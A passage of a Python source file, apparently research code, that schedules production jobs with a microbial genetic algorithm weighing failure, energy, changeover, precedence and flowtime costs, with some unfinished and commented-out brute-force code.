scenario\r\nC2 = 30\r\n\r\n\r\ndef ceil_dt(dt, delta):\r\n ''' \r\n Ceil a data time dt according to the measurement delta.\r\n\r\n Parameters\r\n ----------\r\n dt : datatime\r\n Objective date time to ceil.\r\n delta : timedelta\r\n Measurement precision.\r\n\r\n Returns\r\n -------\r\n Ceiled date time\r\n\r\n '''\r\n tempdelta = dt - datetime.min\r\n if tempdelta % delta != 0:\r\n return dt + (delta - (tempdelta % delta))\r\n else:\r\n return tempdelta\r\n # q, r = divmod(dt - datetime.min, delta)\r\n # return (datetime.min + (q+1)*delta) if r else dt\r\n\r\n\r\ndef floor_dt(dt, delta):\r\n ''' \r\n Floor a data time dt according to the measurement delta.\r\n\r\n Parameters\r\n ----------\r\n dt : datatime\r\n Objective date time to floor.\r\n delta : timedelta\r\n Measurement precision.\r\n\r\n Returns\r\n -------\r\n Floored date time\r\n '''\r\n tempdelta = dt - datetime.min\r\n if tempdelta % delta != 0:\r\n return dt - (tempdelta % delta)\r\n else:\r\n return tempdelta\r\n # q, r = divmod(dt - datetime.min, delta)\r\n # return (datetime.min + (q)*delta) if r else dt\r\n\r\n\r\ndef get_hourly_failure_dict(start_time, end_time, failure_list, down_duration_dict):\r\n ''' \r\n Get the hourly failure rate between a determined start time and end time.\r\n '''\r\n hourly_failure_dict = {}\r\n t_sd = floor_dt(start_time, timedelta(hours=1)) # start time left border\r\n t_eu = ceil_dt(end_time, timedelta(hours=1)) # end time right border\r\n print(\"down duration dict\", down_duration_dict)\r\n \r\n # Filtering down time, get all down durations longer than one hour\r\n down_duration_dict_filtered = collections.OrderedDict()\r\n for key, value in down_duration_dict.items():\r\n if (value[1] - value[0]) / timedelta(hours=1) >= 1:\r\n down_duration_dict_filtered.update({key:[floor_dt(value[0], timedelta(hours=1)), floor_dt(value[1], timedelta(hours=1))]})\r\n \r\n print(\"down_duration_dict_filtered:\", down_duration_dict_filtered)\r\n i = t_sd\r\n index = 0\r\n for value in down_duration_dict_filtered.values():\r\n while i < value[0]:\r\n hourly_failure_dict.update({i:failure_list[index]})\r\n i = i + timedelta(hours=1)\r\n index = index+1\r\n while i <= value[1]:\r\n hourly_failure_dict.update({i:float(0)})\r\n i = i + timedelta(hours=1)\r\n index = 0\r\n \r\n# print(\"i:\", i)\r\n# print(\"index:\", index)\r\n \r\n while i <= t_eu:\r\n hourly_failure_dict.update({i:failure_list[index]})\r\n i = i + timedelta(hours=1)\r\n index = index+1\r\n \r\n return hourly_failure_dict\r\n\r\ndef hamming_distance(s1, s2):\r\n ''' \r\n Calculate the hamming distance (the number of positions at which the corresponding symbols are different) of two list.\r\n\r\n Parameters\r\n ----------\r\n s1: List\r\n A list of job indexes.\r\n \r\n s2: list\r\n A list of job indexes.\r\n \r\n Returns\r\n -------\r\n The hamming distance of two lists.\r\n '''\r\n assert len(s1) == len(s2)\r\n return sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))\r\n\r\n\r\nclass Scheduler(object):\r\n def __init__(self, schedule):\r\n # def __init__(self, job_dict, price_dict, product_related_characteristics_dict, down_duration_dict, precedence_dict,\r\n # start_time, weights, scenario, duration_str, working_method):\r\n self.dna_size = len(schedule.order)\r\n # Attributes assignment\r\n #self.dna_size = len(job_dict)\r\n self.pop = schedule.job_dict.keys()\r\n self.job_dict = schedule.job_dict\r\n self.price_dict = schedule.price_dict\r\n #self.product_related_characteristics_dict = schedule.prc_dict\r\n self.down_duration_dict = schedule.downdur_dict\r\n # self.failure_info = failure_info\r\n # TODO: replace with input data from precedence file\r\n self.precedence_dict = schedule.precedence_dict\r\n self.start_time = schedule.start_time\r\n self.weights = schedule.weights\r\n self.scenario = schedule.scenario\r\n self.duration_str = schedule.duration_str\r\n self.working_method = schedule.working_method \r\n\r\n def get_fitness(self, sub_pop, split_types=False, detail=False):\r\n ''' \r\n Get fitness values for all individuals in a generation.\r\n '''\r\n wf = self.weights.get('weight_failure', 0); wvf =self.weights.get('weight_virtual_failure', 0)\r\n we = self.weights.get('weight_energy', 0); wc = self.weights.get('weight_changeover', 0)\r\n wb = self.weights.get('weight_constraint', 0); wft = self.weights.get('weight_flowtime', 0)\r\n wp = self.weights.get('weight_precedence', 0); nc = self.weights.get('num_changeovers', 0)\r\n factors = (wf, wvf, we, wc, wb, wft, wp, nc)\r\n #import pdb; pdb.set_trace()\r\n if wf or wvf:\r\n #failure_cost, virtual_failure_cost = [np.array(i.get_failure_cost(detail=detail, split_costs=True)) for i in sub_pop]\r\n failure_cost = []\r\n virtual_failure_cost = []\r\n for i in sub_pop:\r\n f_cost, vf_cost = i.get_failure_cost(detail=detail, split_costs=True)\r\n failure_cost.append(np.array(f_cost)); virtual_failure_cost.append(np.array(vf_cost))\r\n else:\r\n failure_cost = [0 for i in sub_pop]\r\n virtual_failure_cost = [0 for i in sub_pop]\r\n if we:\r\n #energy_cost = [self.w2*np.array(get_energy_cost(i, self.start_time, self.job_dict, self.price_dict, self.product_related_characteristics_dict, self.down_duration_dict,\r\n # detail=detail, duration_str=self.duration_str, working_method=self.working_method)) for i in sub_pop]\r\n energy_cost = [np.array(i.get_energy_cost(detail=detail)) for i in sub_pop]\r\n else:\r\n energy_cost = [0 for i in sub_pop]\r\n if wc:\r\n conversion_cost = [np.array(i.get_changeover_cost(detail=detail)) for i in sub_pop]\r\n else:\r\n conversion_cost = [0 for i in sub_pop]\r\n if wb:\r\n constraint_cost = [np.array(i.get_constraint_cost(detail=detail)) for i in sub_pop]\r\n else:\r\n constraint_cost = [0 for i in sub_pop]\r\n if wft:\r\n flowtime_cost = [np.array(i.get_flowtime_cost(detail=detail)) for i in sub_pop]\r\n else:\r\n flowtime_cost = [0 for i in sub_pop]\r\n if wp:\r\n precedence_cost = [np.array(i.get_precedence_cost(detail=detail)) for i in sub_pop]\r\n else:\r\n precedence_cost = [0 for i in sub_pop]\r\n if nc:\r\n num_conversions = [np.array(i.get_num_changeovers(detail=detail)) for i in sub_pop]\r\n else:\r\n num_conversions = [0 for i in sub_pop]\r\n if split_types:\r\n total_cost = (np.array(failure_cost), np.array(virtual_failure_cost), np.array(energy_cost), \r\n np.array(conversion_cost), np.array(constraint_cost), np.array(flowtime_cost),\r\n np.array(precedence_cost), np.array(num_conversions),\r\n factors)\r\n else:\r\n try:\r\n total_cost = wf * np.array(failure_cost) + wvf * np.array(virtual_failure_cost) +\\\r\n we * np.array(energy_cost) + wc * np.array(conversion_cost) + wb * np.array(constraint_cost) +\\\r\n wft * np.array(flowtime_cost) + wp * np.array(precedence_cost) +\\\r\n nc * np.array(num_conversions)\r\n except:\r\n print(np.array(failure_cost).shape, np.array(virtual_failure_cost).shape, np.array(energy_cost).shape,\r\n np.array(conversion_cost).shape, np.array(flowtime_cost).shape, np.array(constraint_cost).shape)\r\n print(detail)\r\n print(constraint_cost)\r\n import pdb; pdb.set_trace()\r\n raise\r\n return total_cost \r\n \r\n \r\n# class BF(Scheduler):\r\n# def __init__(self, job_dict, price_dict, product_related_characteristics_dict, down_duration_dict, precedence_dict,\r\n# start_time, weight1, weight2, weightc, weightb, scenario, duration_str, working_method):\r\n# # Attributes assignment\r\n# super().__init__(job_dict, price_dict, product_related_characteristics_dict, down_duration_dict, precedence_dict,\r\n# start_time, weight1, weight2, weightc, weightb, scenario, duration_str, working_method)\r\n\r\n \r\n# def check_all(self):\r\n# if len(self.pop) > 10:\r\n# raise ValueError('The input is too long, no brute force recommended')\r\n# tot_cost_min = np.inf\r\n# best_sched = []\r\n# tot_cost_max = 0\r\n# worst_sched = []\r\n# import itertools\r\n# allperm = itertools.permutations(self.pop)\r\n# totallen = math.factorial(len(self.pop))\r\n# i = 0\r\n# while i < totallen:\r\n# test = next(allperm)\r\n# tot_cost = self.get_fitness([Schedule(test, \r\n# self.job_dict, self.start_time, \r\n# self.product_related_characteristics_dict,\r\n# self.down_duration_dict, self.price_dict, self.failure_info,\r\n# self.scenario, self.duration_str, self.working_method, self.weights)])[0]\r\n# if tot_cost < tot_cost_min:\r\n# tot_cost_min = tot_cost\r\n# best_sched = test\r\n# if tot_cost > tot_cost_max:\r\n# tot_cost_max = tot_cost\r\n# worst_sched = test\r\n# i += 1\r\n# print(str(i) + '/' + str(totallen) + '\\t {:}'.format(tot_cost_min), end='\\r')\r\n# if msvcrt.kbhit() == True:\r\n# char = msvcrt.getch()\r\n# if char in [b'c', b'q']:\r\n# print('User hit c or q button, exiting...')\r\n# break\r\n# print('\\n')\r\n\r\n# return tot_cost_min, tot_cost_max, best_sched, worst_sched\r\n\r\n\r\nclass GA(Scheduler):\r\n def __init__(self, schedule, settings):\r\n # def __init__(self, dna_size, cross_rate, mutation_rate, pop_size, pop, job_dict, price_dict, \r\n # product_related_characteristics_dict, down_duration_dict, precedence_dict, start_time, weights, scenario,\r\n # num_mutations=1, duration_str='expected', evolution_method='roulette', validation=False, pre_selection=False,\r\n # working_method='historical', failure_info=None):\r\n # Attributes assignment\r\n super().__init__(schedule)\r\n self.schedule = schedule\r\n self.pop_size = settings.pop_size\r\n self.cross_rate = settings.cross_rate\r\n self.mutation_rate = settings.mutation_rate\r\n self.num_mutations = settings.num_mutations\r\n self.evolution_method = settings.evolution_method\r\n self.validation = settings.validation\r\n self.pre_selection = settings.pre_selection\r\n # generate N random individuals (N = pop_size)\r\n # BETTER METHOD: FUTURE WORK\r\n # Add functionality: first due date first TODO:\r\n if self.pre_selection == True:\r\n # In this case, EDD rule has already been applied on the pop\r\n # Such procedure is executed in run_opt()\r\n self.pop = np.array([schedule for _ in range(self.pop_size)])\r\n #self.pop = np.vstack(pop for _ in range(pop_size))\r\n else:\r\n self.pop = np.array([schedule.copy_random()\r\n for _ in range(self.pop_size)])\r\n #self.pop = np.vstack([np.random.choice(pop, size=self.dna_size, replace=False) for _ in range(pop_size)])\r\n self.memory = []\r\n self.fitness = self.get_fitness(self.pop)\r\n \r\n def crossover(self, winner_loser): \r\n ''' Using microbial genetic evolution strategy, the crossover result is used to represent the loser.\r\n An example image of this can be found in 'Production Scheduling and Rescheduling with Genetic Algorithms, C. Bierwirth, page 6'.\r\n '''\r\n def crossover_function(L, W):\r\n M = [bool(random.randint(0, 1)) for item in L]\r\n temp = list(W.copy())\r\n for (m, i) in zip(M, range(len(L))):\r\n if m:\r\n temp.remove(L[i])\r\n #print(temp)\r\n\r\n child = []\r\n j = 0\r\n for (m, i) in zip(M, range(len(L))):\r\n if m:\r\n child.append(L[i])\r\n else:\r\n child.append(temp[j])\r\n j += 1\r\n return child\r\n \r\n # crossover for loser\r\n if np.random.rand() < self.cross_rate:\r\n try:\r\n #import pdb; pdb.set_trace()\r\n #mask = np.random.randint(0, 2, len(winner_loser[0])).astype(np.bool))\r\n #keep_job = winner_loser[1][~mask]\r\n \r\n #np.place(winner_loser[0], ~mask, keep_job)\r\n winner = winner_loser[0]\r\n loser = winner_loser[1]\r\n \r\n child = crossover_function(loser, winner)\r\n winner_loser[1] = child\r\n \r\n if False: # do not execute this any more\r\n cross_points = np.random.randint(0, 2, self.dna_size).astype(np.bool)\r\n keep_job = winner_loser[1][~cross_points] # see the progress explained in the paper\r\n swap_job = winner_loser[0, np.isin(winner_loser[0].ravel(), keep_job, invert=True)]\r\n winner_loser[1][:] = np.concatenate((keep_job, swap_job))\r\n except:\r\n #print(keep_job)\r\n raise\r\n return winner_loser\r\n\r\n def crossover_similar(self, winner_loser): \r\n ''' Using microbial genetic evolution strategy, the crossover result is used to represent the loser.\r\n This algorithm keeps the jobs which are common between two lists at the same place.\r\n An example image of this can be found in 'A genetic algorithm for hybrid flowshops, page 788'.\r\n '''\r\n # determine common points\r\n #print(winner_loser.shape)\r\n # crossover for loser\r\n if np.random.rand() < self.cross_rate:\r\n try:\r\n winner = np.array(winner_loser[0])\r\n loser = np.array(winner_loser[1])\r\n winner_out = winner.copy()\r\n loser_out = loser.copy()\r\n same = (winner == loser)\r\n\r\n cross_point = int(np.random.choice(np.arange(len(winner)), size=1))\r\n same[:cross_point] = True\r\n different = np.invert(same)\r\n\r\n np.putmask(loser_out, different, winner[np.isin(winner, different)])\r\n np.putmask(winner_out, different, loser[np.isin(loser, different)])\r\n except:\r\n raise\r\n #winner_loser = np.array([winner_out, loser_out])\r\n return winner_loser\r\n\r\n def mutate(self, loser, prob=False, perimeter=None):\r\n ''' Using microbial genetic evolution strategy, mutation only works on the loser.\r\n Two random points change place here.\r\n '''\r\n # mutation for loser, randomly choose two points and do the swap\r\n if np.random.rand() < self.mutation_rate:\r\n tmpl = list(range(self.dna_size))\r\n try:\r\n #if prob:\r\n # point = np.random.choice(tmpl, size=1, replace=False, p=prob)\r\n #else:\r\n point = np.random.choice(tmpl, size=1, replace=False)\r\n except:\r\n import pdb; pdb.set_trace()\r\n # tmpl.pop(int(point))\r\n # prob.pop(int(point))\r\n # inverse = list(np.array(prob).max() - np.array(prob))\r\n # inverse = inverse / sum(inverse)\r\n if perimeter == None:\r\n perimeter = len(tmpl)\r\n random_number = np.random.choice(list(range(-perimeter, perimeter+1)), size=1)\r\n swap_point = int(point) + int(random_number)\r\n if swap_point >= len(loser):\r\n swap_point = len(loser)-1\r\n if swap_point < 0:\r\n swap_point = 0\r\n #swap_point = np.random.choice(tmpl, size=1, replace=False)\r\n #import pdb; pdb.set_trace()\r\n # swap_point = int(swap_point); point = int(point)\r\n # point, swap_point = np.random.randint(0, self.dna_size, size=2)\r\n loser[swap_point], loser[point] = loser[point], loser[swap_point]\r\n return loser\r\n \r\n\r\n def mutate_swap(self, loser, prob=False):\r\n ''' Using microbial genetic evolution strategy, mutation only works on the loser.\r\n One job changes place here.\r\n '''\r\n loser = list(loser)\r\n # mutation for loser, randomly choose two points and do the swap\r\n if np.random.rand() < self.mutation_rate:\r\n if prob:\r\n tmpl = list(range(self.dna_size))\r\n try:\r\n point = int(np.random.choice(tmpl, size=1, replace=False, p=prob))\r\n except:\r\n import pdb; pdb.set_trace()\r\n raise\r\n tmpl.pop(int(point))\r\n # prob.pop(int(point))\r\n # inverse = list(np.array(prob).max() - np.array(prob))\r\n # inverse = inverse / sum(inverse)\r\n insert_point = int(np.random.choice(tmpl, size=1, replace=False))\r\n else:\r\n point, insert_point = np.random.choice(range(self.dna_size), size=2, replace=False)\r\n point = int(point); insert_point = int(insert_point)\r\n # point, swap_point = np.random.randint(0, self.dna_size, size=2)\r\n #import pdb; pdb.set_trace()\r\n loser.insert(insert_point, loser.pop(point))\r\n #swap_A, swap_B = loser[point], loser[swap_point]\r\n #loser[point], loser[swap_point] = swap_B, swap_A\r\n return loser \r\n \r\n def evolve(self, n, evolution=None):\r\n ''' \r\n Execution of the provided GA.\r\n\r\n Parameters\r\n ----------\r\n n: int\r\n Number of iteration times \r\n '''\r\n\r\n i = 1\r\n if evolution == None:\r\n evolution = self.evolution_method\r\n num_couples = 1\r\n\r\n while i <= n: # n is the number of evolution times in one iteration\r\n\r\n if evolution == 'roulette':\r\n fitness = self.fitness\r\n self.pop = self.pop[np.argsort(fitness)]\r\n self.fitness = np.sort(fitness)\r\n\r\n # choose sub-population according to roulette principle\r\n idx = range(len(self.pop))\r\n prob = [1/(x+2) for x in idx]\r\n prob = [p / sum(prob) for p in prob]\r\n # roulette wheel \r\n sub_pop_idx = np.random.choice(idx, size=num_couples * 2, replace=False, p=prob)\r\n elif evolution == 'random': # if evolution = 'random':\r\n sub_pop_idx = np.random.choice(np.arange(0, self.pop_size), size=2, replace=False)\r\n else:\r\n raise ValueError('Evolution parameter should be one of [random, roulette], not found.')\r\n\r\n # for each pair of schedules:\r\n for j in list(range(len(sub_pop_idx) >> 1)):\r\n temp_pop_idx = sub_pop_idx[j:j+2]\r\n #sub_pop = self.pop[temp_pop_idx] # pick 2 individuals from pop\r\n #fitness = self.get_fitness(sub_pop) # get the fitness values of the two\r\n \r\n # Elitism Selection\r\n #winner_loser_idx = np.argsort(fitness)\r\n if evolution == 'roulette':\r\n winner_loser_idx = np.sort(temp_pop_idx)\r\n elif evolution == 'random':\r\n sub_pop = self.pop[temp_pop_idx] # pick 2 individuals from pop\r\n fitness = self.fitness[temp_pop_idx]\r\n #fitness = self.get_fitness(sub_pop) # get the fitness values of the two\r\n winner_loser_idx = temp_pop_idx[np.argsort(fitness)]\r\n else:\r\n raise ValueError('Evolution parameter should be one of [random, roulette], not found.')\r\n \r\n# print('winner_loser_idx', winner_loser_idx)\r\n\r\n winner_loser = np.array([np.array(p.order) for p in self.pop[winner_loser_idx]])\r\n winner = winner_loser[0]; loser = winner_loser[1] # the first is winner and the second is loser\r\n\r\n #print('\\nsubpop', winner_loser)\r\n #time.sleep(0.1)\r\n \r\n origin = loser.copy() # pick up the loser for genetic operations\r\n\r\n # Crossover (of the winner and the loser)\r\n winner_loser = self.crossover(winner_loser)\r\n \r\n # Mutation (only on the child)\r\n loser = winner_loser[1]\r\n for k in range(self.num_mutations):\r\n # determine mismatch for each task\r\n if evolution == 'roulette':\r\n detailed_fitness = self.schedule.copy_neworder(loser).get_fitness(detail=True)\r\n if sum(detailed_fitness) == 0:\r\n detailed_fitness = [f+1 for f in detailed_fitness]\r\n #detailed_fitness = self.get_fitness([self.schedule.copy_neworder(loser)], detail=True)[0]\r\n # detailed_fitness = self.get_fitness([Schedule(loser, self.job_dict, self.start_time, \r\n # self.product_related_characteristics_dict,\r\n # self.down_duration_dict, self.price_dict, self.precedence_dict, self.failure_info,\r\n # self.scenario, self.duration_str, self.working_method, self.weights)], detail=True)[0]\r\n #print(detailed_fitness)\r\n mutation_prob = [f/sum(detailed_fitness) for f in detailed_fitness]\r\n #loser = self.mutate(loser)\r\n loser = self.mutate(loser, mutation_prob)\r\n elif evolution == 'random':\r\n loser = self.mutate(loser)\r\n else:\r\n raise ValueError('Evolution parameter should be one of [random, roulette], not found.')\r\n winner_loser[1] = loser\r\n\r\n # for i in np.arange(, self.pop_size):\r\n # other = self.pop[i]\r\n # for j in range(self.num_mutations):\r\n # other = self.mutate(other)\r\n # self.pop[i] = other\r\n\r\n# print(\"Start validate:\")\r\n flag = 0\r\n \r\n loser = self.schedule.copy_neworder(loser)\r\n # loser = Schedule(loser, self.job_dict, self.start_time, self.product_related_characteristics_dict,\r\n # self.down_duration_dict, self.price_dict, self.precedence_dict, self.failure_info, \r\n # self.scenario, self.duration_str, self.working_method, self.weights)\r\n \r\n #print('validation step')\r\n flag = 0\r\n #if self.validation:\r\n # if not loser.validate():\r\n # pass\r\n #self.pop[sub_pop_idx] = winner_loser\r\n #i = i + 1 # End of an evolution procedure\r\n #flag = 1\r\n\r\n if flag == 0:\r\n if evolution == 'roulette':\r\n bottomlist = list(range(self.pop_size >> 1, self.pop_size))\r\n choice = np.random.choice(bottomlist)\r\n self.pop[choice] = loser\r\n # sort the fitness values\r\n # fitness = self.fitness\r\n # replace one of the least values for fitness\r\n self.fitness[choice] = self.get_fitness([loser])[0]\r\n else:\r\n self.pop[winner_loser_idx[1]] = loser\r\n self.fitness[winner_loser_idx[1]] = self.get_fitness([loser])[0]\r\n\r\n\r\n #print('After:', self.get_fitness(self.pop))\r\n i = i + 1 # End of procedure\r\n else:\r\n #print(\"In memory, start genetic operation again!\")\r\n pass\r\n #else:\r\n #print(\"Distance too small, start genetic operation again!\")\r\n # pass\r\n\r\n #if evolution != 'roulette':\r\n # fitness = self.get_fitness(self.pop)\r\n\r\n return self.pop, self.fitness\r\n\r\n\r\ndef run_bf(start_time, end_time, down_duration_file, failure_file, prod_rel_file, energy_file, job_file,\r\n scenario, weights, duration_str='duration', \r\n working_method='historical', failure_info=None):\r\n # Generate raw material unit price\r\n if working_method == 'historical':\r\n try:\r\n down_duration_dict = select_from_range(start_time, end_time, read_down_durations(down_duration_file), 0, 1) # File from EnergyConsumption/InputOutput\r\n #print('test')\r\n if weight_failure != 0:\r\n if (failure_file is not None):\r\n failure_list = read_failure_data(failure_file) # File from failuremodel-master/analyse_production\r\n #print(weight_failure)\r\n #hourly_failure_dict = get_hourly_failure_dict(start_time, end_time, failure_list, down_duration_dict)\r\n #with open('range_hourly_failure_rate.csv', 'w', newline='\\n') as csv_file:\r\n # writer = csv.writer(csv_file)\r\n # for key, value in hourly_failure_dict.items():\r\n # writer.writerow([key, value])\r\n failure_info = None\r\n else:\r\n raise ValueError('No failure info found!')\r\n except:\r\n warnings.warn('Import of downtime durations failed, using scheduling without failure information.')\r\n failure_downtimes = True\r\n if (working_method != 'historical') or failure_downtimes:\r\n warnings.warn('No import of downtime durations.')\r\n down_duration_dict = {}\r\n\r\n# print(\"down_duration_dict: \", down_duration_dict)\r\n# print(\"hourly_failure_dict: \", hourly_failure_dict)\r\n# exit()\r\n \r\n product_related_characteristics_dict = read_product_related_characteristics(prod_rel_file)\r\n \r\n price_dict_new = read_price(energy_file) # File from EnergyConsumption/InputOutput\r\n# price_dict_new = read_price('electricity_price.csv') # File generated from generateEnergyCost.py\r\n if (start_time != None) and (end_time != None):\r\n job_dict_new = select_from_range(start_time, end_time, read_jobs(job_file), 'start', 'end') # File from EnergyConsumption/InputOutput\r\n elif (start_time != None):\r\n job_dict_new = read_jobs(job_file)\r\n else:\r\n raise NameError('No start time found!')\r\n\r\n job_dict_new = job_dict_new.astype(job_dict)\r\n\r\n # TODO: change\r\n# print(\"failure_dict\", failure_dict)\r\n# exit()\r\n# # write corresponding failure dict into file\r\n# with open('ga_013_failure_plot.csv', 'w', newline='\\n') as csv_file:\r\n# writer = csv.writer(csv_file)\r\n# for key, value in failure_dict_new.items():\r\n# writer.writerow([key, value])\r\n\r\n waiting_jobs = [*job_dict_new]\r\n \r\n if not waiting_jobs:\r\n raise ValueError(\"No waiting jobs!\")\r\n else:\r\n try:\r\n first_start_time = job_dict_new.get(waiting_jobs[0])['start'] # Find the start time of original schedule\r\n except:\r\n first_start_time = start_time\r\n\r\n bf = BF(job_dict=job_dict_new, price_dict=price_dict_new,\r\n product_related_characteristics_dict = product_related_characteristics_dict, down_duration_dict=down_duration_dict,\r\n start_time=first_start_time, weights=weights, scenario=scenario, working_method=working_method, \r\n duration_str=duration_str, failure_info=failure_info)\r\n \r\n best_result, worst_result, best_schedule, worst_schedule = bf.check_all()\r\n\r\n best_schedule = Schedule(best_schedule, job_dict_new, first_start_time, product_related_characteristics_dict,\r\n down_duration_dict, price_dict_new, failure_info, scenario, duration_str, working_method, weights)\r\n\r\n f_cost, vf_cost, e_cost, c_cost, d_cost, ft_cost, factors = best_schedule.get_fitness(split_types=True)\r\n total_cost = f_cost * factors[0] + vf_cost * factors[1] + e_cost * factors[2] + c_cost * factors[3] + d_cost * factors[4] + ft_cost * factors[5]\r\n #total_cost = list(itertools.chain(*total_cost))\r\n #import pdb; pdb.set_trace()\r\n\r\n print(\"Best failure cost: \" + str(f_cost))\r\n print(\"Best virtual failure cost: \" + str(vf_cost))\r\n print(\"Best energy cost: \" + str(e_cost)) \r\n print(\"Best conversion cost: \" + str(c_cost))\r\n print(\"Best deadline cost: \" + str(d_cost))\r\n print(\"Best flowtime cost: \" + str(ft_cost))\r\n print(\"Factors: \" + str(factors))\r\n print(\"Best total cost: \" + str(total_cost))\r\n print()\r\n \r\n\r\n worst_schedule = Schedule(worst_schedule, job_dict_new, first_start_time, product_related_characteristics_dict,\r\n down_duration_dict, price_dict_new, failure_info, scenario, duration_str, working_method, weights)\r\n\r\n f_cost, vf_cost, e_cost, c_cost, d_cost, ft_cost, factors = worst_schedule.get_fitness(split_types=True)\r\n total_cost = f_cost * factors[0] + vf_cost * factors[1] + e_cost * factors[2] + c_cost * factors[3] + d_cost * factors[4] + ft_cost * factors[5]\r\n #total_cost = list(itertools.chain(*total_cost))\r\n #import pdb; pdb.set_trace()\r\n\r\n print(\"Worst failure cost: \" + str(f_cost))\r\n print(\"Worst virtual failure cost: \" + str(vf_cost))\r\n print(\"Worst energy cost: \" + str(e_cost)) \r\n print(\"Worst conversion cost: \" + str(c_cost))\r\n print(\"Worst deadline cost: \" + str(d_cost))\r\n print(\"Worst flowtime cost: \" + str(ft_cost))\r\n print(\"Factors: \" + str(factors))\r\n print(\"Worst total cost: \" + str(total_cost))\r\n\r\n # best_result_dict = best_schedule.get_time()\r\n # worst_result_dict = worst_schedule.get_time()\r\n\r\n return best_result, worst_result, best_schedule, worst_schedule \r\n\r\n \r\n# def run_opt(start_time, end_time, down_duration_file, failure_file, prod_rel_file, precedence_file, energy_file, job_file, failure_info,\r\n# urgent_job_info, breakdown_record_file, scenario, iterations, cross_rate, mut_rate, pop_size, num_mutations=5, adaptive=[],\r\n# stop_condition='num_iterations', stop_value=None, weights={},\r\n# duration_str='duration', evolution_method='roulette', validation=False, pre_selection=False, working_method='historical', add_time=0,\r\n# remove_breaks=False):\r\n\r\ndef run_opt(original_schedule, settings, start_time=None):\r\n\r\n iterations = settings.iterations\r\n stop_condition = settings.stop_condition\r\n stop_value = settings.stop_value\r\n adaptive = settings.adapt_ifin\r\n \r\n # if multiple schedules of course the costs of both the schedules will be saved\r\n # after the first schedule is calculated the end time is saved and then the next schedule is calculated from then on\r\n # initialise some data structures to save all of this\r\n try:\r\n logging.info('Using '+ str(original_schedule.working_method) + ' method')\r\n if start_time == None:\r\n logging.info(\"Original schedule start time: \" + str(original_schedule.start_time.isoformat()))\r\n else:\r\n logging.info(\"Schedule start time: \" + str(start_time.isoformat()))\r\n original_schedule.set_starttime(start_time)\r\n except: \r\n pass\r\n \r\n total_result = original_schedule.get_fitness()\r\n # original_schedule.validate()\r\n result_dict = {}\r\n result_dict.update({0:total_result})\r\n \r\n ga = GA(original_schedule, settings)\r\n\r\n best_result_list = []\r\n worst_result_list = [] \r\n mean_result_list = []\r\n best_result_list_no_constraint = []\r\n worst_result_list_no_constraint = [] \r\n generation = 0\r\n stop = False\r\n timer0 = time.monotonic()\r\n \r\n #no_constraint = original_schedule.weights.copy()\r\n #no_constraint['weight_constraint'] = 0\r\n while not stop:\r\n if generation in adaptive:\r\n print()\r\n print(str(generation) + ' reached - changing parameters of the GA')\r\n ga.cross_rate /= 2\r\n ga.mutation_rate = (ga.mutation_rate + 1) / 2\r\n #ga.cross_rate = (ga.cross_rate + 1) / 2\r\n #ga.mutation_rate /= 2\r\n# print(\"Gen: \", generation)\r\n pop, res = ga.evolve(1) # natural selection, crossover and mutation\r\n #print(\"pop:\", pop)\r\n #print(\"res:\", res)\r\n #import pdb; pdb.set_trace()\r\n best_index = np.argmin(res)\r\n worst_index = np.argmax(res)\r\n mean = np.mean(res)\r\n sys.stdout.write(f'\\r{generation}/{iterations}:\\t{res[best_index]:15.3f}')\r\n #print(str(generation) + '/' + str(iterations) + ':\\t' + str(res[best_index]), end=''); \r\n sys.stdout.flush() # overwrite this line continually\r\n generation += 1\r\n\r\n best_result_list.append(res[best_index])\r\n worst_result_list.append(res[worst_index])\r\n mean_result_list.append(mean)\r\n \r\n #best_result_list_no_constraint.append(pop[best_index].get_fitness(weights=no_constraint))\r\n #worst_result_list_no_constraint.append(pop[worst_index].get_fitness(weights=no_constraint))\r\n\r\n if generation >= iterations:\r\n stop = True\r\n if stop_condition == 'end_value':\r\n if res[best_index] < stop_value:\r\n print('\\n')\r\n stop = True\r\n elif stop_condition == 'abs_time':\r\n timer1 = time.monotonic() # returns time in seconds\r\n elapsed_time = timer1-timer0\r\n if elapsed_time >= stop_value:\r\n print('\\n')\r\n stop = True\r\n if sys.platform == \"win32\" and msvcrt.kbhit() == True: # Only works on Windows\r\n char = msvcrt.getche()\r\n if char in [b'c', b'q']:\r\n print('\\nUser hit c or q button, exiting...')\r\n stop = True\r\n \r\n lists_result = pd.DataFrame({'best': best_result_list, 'mean': mean_result_list, 'worst': worst_result_list})\r\n #lists_result_no_constraint = pd.DataFrame({'best': best_result_list_no_constraint, 'worst': worst_result_list_no_constraint})\r\n \r\n timer1 = time.monotonic()\r\n elapsed_time = timer1-timer0\r\n \r\n logging.info('Stopping after ' + str(generation) + ' iterations. Elapsed time: ' + str(round(elapsed_time, 2)))\r\n \r\n\r\n print()\r\n logging.info(\"Candidate schedule \" + str(pop[best_index].order))\r\n candidate_schedule = pop[best_index]\r\n \r\n if settings.validation == True:\r\n valid = candidate_schedule.validate()\r\n if valid:\r\n logging.info('Valid schedule found')\r\n else:\r\n logging.info('Invalid schedule found!')\r\n\r\n candidate_schedule.print_fitness()\r\n\r\n total_cost = candidate_schedule.get_fitness()\r\n \r\n# print(\"Most fitted cost: \", res[best_index])\r\n\r\n logging.info(\"\\nOriginal schedule: \" + str(original_schedule.order))\r\n# print(\"DNA_SIZE:\", DNA_SIZE) \r\n \r\n original_schedule.print_fitness()\r\n\r\n original_cost = original_schedule.get_fitness()\r\n \r\n #print(duration_str)\r\n #result_dict = candidate_schedule.get_time()\r\n #result_dict = visualize(candidate_schedule, first_start_time, job_dict_new, price_dict_new, product_related_characteristics_dict, \r\n # down_duration_dict, hourly_failure_dict, energy_on=True, failure_on=True, duration_str=duration_str, working_method=working_method)\r\n #import pdb; pdb.set_trace()\r\n #result_dict_origin = original_schedule.get_time()\r\n #result_dict_origin = visualize(original_schedule, first_start_time, job_dict_new, price_dict_new, product_related_characteristics_dict, \r\n # down_duration_dict, hourly_failure_dict, energy_on=True, failure_on=True, duration_str=duration_str, working_method=working_method)\r\n# print(\"Visualize_dict_origin:\", result_dict)\r\n# print(\"Down_duration\", down_duration_dict)\r\n\r\n\r\n # # Output for visualization\r\n # with open('executionRecords.csv', 'w', newline='\\n') as csv_file:\r\n # writer = csv.writer(csv_file)\r\n # for key, value in result_dict.items():\r\n # writer.writerow([key, value['start'], value['end'], value['totaltime']])\r\n \r\n # with open('originalRecords.csv', 'w', newline='\\n') as csv_file:\r\n # writer = csv.writer(csv_file)\r\n # for key, value in result_dict_origin.items():\r\n # writer.writerow([key, value['start'], value['end'], value['totaltime']])\r\n \r\n # with 